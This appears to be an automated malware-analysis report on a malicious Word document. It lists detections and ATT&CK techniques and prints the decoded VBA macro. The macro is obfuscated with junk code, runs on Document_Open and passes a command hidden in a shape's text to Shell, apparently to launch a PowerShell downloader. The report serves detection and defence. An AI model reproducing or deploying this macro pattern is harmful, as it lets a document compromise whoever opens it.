MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1059.003 Windows Command Shell
The sample contains a Document_Open VBA macro that utilizes the Shell() function to execute a command. This command invokes cmd.exe with arguments that appear to construct and execute a PowerShell command. The PowerShell command is designed to download content from multiple URLs, suggesting it's a downloader for a second-stage payload. The presence of cmd.exe and PowerShell execution, along with the Shell() call, strongly indicates a malicious intent to compromise the system.
Heuristics 9
-
ClamAV: Doc.Malware.Dkah-6765199-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dkah-6765199-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
IjQsIiFGL = CByte(122056711) jZPVw = Array(tXVzssz, Interaction.Shell(iQRmh, HjDrF), wdYGmJrj) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7593 bytes |
SHA-256: 6093b01cef2836d8b54165f145d9a5dc87cc6a7c110afd7e0245744da0877b00 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
163 of 244 identifiers look randomly generated (e.g. 'QQpVznZzlhph') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QQpVznZzlhph"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
jQzCwjK = Atn(CXYAj)
AswKpqWk = CLng(pQJkfwKQ)
cwKGrdZZ = Cos(rZMsSsEt)
fREjH = CByte(cJmpvfErG)
YiiuAUlPF = CByte(206844254)
bwzQjl = CBool(288524834)
wavqMiir = iFmhFwtK
zGLjpac = 257697849
MoZPt = CByte(81013964)
On Error Resume Next
wwRBX = Atn(jhUjmT)
qKtFCBt = CLng(YqopzfhMs)
zAQhdUWWF = Cos(mHiHS)
cPDAPDw = CByte(ZGdLa)
zUcjnSMI = CByte(215801482)
ifvoMQL = CBool(216824264)
VCRJrhw = OIXqL
RFRfvTzPT = 229487652
SjHKpIu = CByte(319801746)
Set SdrSP = Shapes("QtLiaYCsZzI")
On Error Resume Next
IGdjMR = Atn(BOOZivo)
KEiDmR = CLng(brGXhl)
mXija = Cos(QVHzC)
udzAwZju = CByte(qrTjzwflZ)
jmzbruzV = CByte(251256537)
owiAFWicr = CBool(66264399)
wqIwfLAcF = jhJTuvBI
zEzzF = 300772287
SdaOC = CByte(308014917)
On Error Resume Next
rkFic = Atn(jzqUi)
CVckFzBw = CLng(WjDfR)
UjBEScFsu = Cos(lfHdsA)
JYBAwc = CByte(iTJAVD)
zKOOQ = CByte(273037046)
PFwdiU = CBool(128777385)
tUQVUt = QrWDm
zTEXqNm = 134707744
ObLwuSEXQ = CByte(53247228)
On Error Resume Next
NjiVGPEl = Atn(DZVqDd)
zjuPBQz = CLng(jaoFWojHi)
QZnBul = Cos(UljfwcPq)
vqJvhwi = CByte(ljbwOaXR)
XmEjwlJb = CByte(216706960)
NTlzYPBs = CBool(271926514)
nlUqEPOKq = KMNLF
lmzFAUA = 109773931
PziCjNi = CByte(226477689)
On Error Resume Next
cSzvpF = Atn(NPDiI)
rnUHvJ = CLng(LFFEZELTj)
snEiat = Cos(vFVRz)
sjXjWrLdm = CByte(KDXNu)
luiiDLv = CByte(29704418)
QtKMpni = CBool(86389929)
NYCUpb = hFjtfDj
ZUaiTq = 218492580
SGFzBRzS = CByte(210580366)
On Error Resume Next
qGGwmwW = Atn(AOtqSrqi)
sXMNZkFH = CLng(BviLIAip)
AAtpfWfS = Cos(dRwqLFqCw)
MQWAqGwbw = CByte(FtLdCqip)
sphGo = CByte(182854627)
jLjdVFDjd = CBool(164648070)
zDiivhd = kFToVbBzE
fJiYA = 153778194
rUTApiAc = CByte(76318884)
On Error Resume Next
asphI = Atn(ulzZrWn)
IYRnlw = CLng(zlnhu)
PzGTqFF = Cos(cIzIqNzqJ)
hmRAGzwh = CByte(EdGBzO)
imqFBQiSf = CByte(100235047)
fvlEHc = CBool(4511491)
HMPtJ = IvAWWHA
riLADlQEz = 136425617
fRmYzWdAz = CByte(44116818)
iQRmh = SdrSP.TextFrame.ContainingRange
On Error Resume Next
AuRLwS = Atn(jsKYvozb)
jwVqjlJNi = CLng(lZcTJLwOq)
vPQHTjl = Cos(mtUic)
rsNtkP = CByte(DhGjIHYB)
zZJEwU = CByte(210177200)
XAzJak = CBool(142924117)
wHcQz = iamrh
bKYNwY = 306623338
UYXWMAWjQ = CByte(177469939)
On Error Resume Next
UIYaaVB = Atn(oRjfmFb)
rEZEU = CLng(JAGAwXvGL)
bpDwApJ = Cos(WaSnGjwFJ)
wOfVCiw = CByte(TaYiZiF)
DzCfBC = CByte(305115784)
itXWuaB = CBool(286322745)
SJwpFm = wdVjasB
hrcBDicu = 135588262
nJGbd = CByte(298726406)
On Error Resume Next
VuRKzwSV = Atn(LsWmBH)
vkIDJzr = CLng(iMwURWsVD)
ZlQEwsFkt = Cos(faEOncU)
sSWVD = CByte(jmzzEr)
XSobVH = CByte(279015594)
PwZGRSDI = CBool(234876204)
pCmckbDh = XKuHjBGII
nRUdSd = 136934206
PmzddOQOp = CByte(210961418)
On Error Resume Next
NKFwQ = Atn(mavXsh)
JjnfhL = CLng(XEzFOw)
QjUKNll = Cos(SfVMz)
ZhnBucCr = CByte(wIOmjJLz)
SqWrbNiw = CByte(210066250)
OIKVM = CBool(182404273)
XLEUWZYDV = wzFsH
mtINiFaW = 328967227
vdXomCKim = CByte(338486537)
On Error Resume Next
TziiJDzj = Atn(ocoqc)
paPwGzMXK = CLng(QNhlBBX)
IDDIBjOU = Cos(tPtIfWVaP)
hdlHbYKs = CByte(PwDnEBiZm)
ZjilASIQ = CByte(97371437)
rMKmQpJW = CBool(316322619)
jqnYFAp = oHwzjtp
zrloS = 52589509
HwDoRXPrL = CByte(191522524)
On Error Resume Next
jrPJHi = Atn(aGKmnP)
jUPAZFqBv = CLng(ODUztraB)
QVMhXm = Cos(vnfPQLJa)
oizMAciv = CByte(vEKShOjl)
wVUnsOt = CByte(66633975)
WjRCt = CBool(300287369)
FJaoQo = RAchVdGQ
fpKFMBql = 123190904
ZMPPsKQBb = CByte(35128681)
On Error Resume Next
mTafvGB = Atn(jKTFR)
dBdkQuqrl = CLng(QlUmGEv)
dHYDJFD = Cos(ILuubE)
NlcBqM = CByte(hviwP)
mOvbO = CByte(280932042)
KVasXjw = CBool(249876715)
wqALaHB = DFQaZdV
qtiuQT = 210634957
cArLjdKN = CByte(112580955)
Const HjDrF = 0
On Error Resume Next
tZpUjjT = Atn(PXXwO)
sONaVuc = CLng(KPioEJ)
PisdW = Cos(jjJzc)
zkJbwI = CByte(iBlfjBvZ)
ZmsiJA = CByte(341586158)
iVrOIhEd = CBool(296970983)
cjBnljS = IdCLcbk
GXFzKzk = 131625519
bQXaThCna = CByte(120681056)
On Error Resume Next
zzSzALE = Atn(SFkmAKP)
hqThimmvX = CLng(CLSFkT)
mNAltCp = Cos(ZZNHBCWuI)
vcivN = CByte(WckJtL)
VQJNzP = CByte(51447905)
niqFMYnW = CBool(86942597)
RKEorurA = OQSfzNMs
spZiANHws = 272997304
niFXd = CByte(187428299)
On Error Resume Next
sAisKopf = Atn(qwRhCalvr)
jiGKi = CLng(oWlzO)
OBNwvVf = Cos(UEcZjwUtE)
whruJImq = CByte(jVREj)
OhPUGfPQ = CByte(338317225)
fCjihouS = CBool(324413070)
jkUrF = EVvWD
wsSPF = 167711643
IjQsIiFGL = CByte(122056711)
jZPVw = Array(tXVzssz, Interaction.Shell(iQRmh, HjDrF), wdYGmJrj)
On Error Resume Next
CBuuCFzt = Atn(iwdfTmLkQ)
jatdMAcQE = CLng(GbutFpQF)
JOziTddU = Cos(NJJukFzJI)
itaouHn = CByte(BjZiW)
wGkjs = CByte(168012419)
ijkDv = CBool(185685578)
qowwjs = sjZCajV
kSimDwd = 136314343
QjXzMq = CByte(249727793)
On Error Resume Next
sPYRqGMEs = Atn(zzJLY)
XdXpasz = CLng(izFYGKB)
HciRUVMo = Cos(zVssmzIRc)
EaASAQwj = CByte(BowiDQrhj)
JBQjz = CByte(173046404)
GjwAwHd = CBool(157774899)
GGJiBXmWm = Bnpbu
bJSlor = 21383949
iJMnqFjUK = CByte(40031720)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.